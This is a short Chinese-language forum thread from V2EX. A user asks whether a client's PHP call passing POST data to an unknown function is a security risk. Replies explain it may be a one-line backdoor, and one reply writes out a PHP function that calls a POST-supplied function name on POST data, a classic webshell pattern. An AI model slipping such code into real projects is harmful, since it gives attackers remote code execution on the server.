首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
hopboy
V2EX  ›  问与答

jqueryserver($_post['data']); 有风险吗?

  •   
  •   hopboy · 2020 年 12 月 19 日 · 1273 次点击
    这是一个创建于 1871 天前的主题,其中的信息可能已经有所发展或是发生改变。

    接了一个客户的项目放我们的服务器, 客户代码里面这个部分有风险吗?

    jqueryserver($_post['data']);

  • data'
  • post
  • jqueryserver
  • 客户
    4 条回复    2020-12-19 21:15:01 +08:00
    Xusually
        1
    Xusually  
       2020 年 12 月 19 日
    具体还是得看 jqueryserver()是干嘛的吧,如果收到提交过来的数据直接执行类似于 eval 之类的,那就是个一句话后门。
    但是你都让对方把代码部署在你们服务器上了,我感觉防不慎防啊🤦‍♂️
    imdong
        2
    imdong  
       2020 年 12 月 19 日 via iPhone
    然后发现代码如下。

    function jqeryserver($data)
    {
    $_POST["action"]($data);
    }
    ihipop
        3
    ihipop  
       2020 年 12 月 19 日 via Android
    @imdong 这是一句话木马
    msg7086
        4
    msg7086  
       2020 年 12 月 19 日
    本身没太大风险,但是如果遇上不知道怎么配置服务器的运维,那就是很大的风险了……
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   2424 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 14:21 · PVG 22:21 · LAX 06:21 · JFK 09:21
    ♥ Do have faith in what you're doing.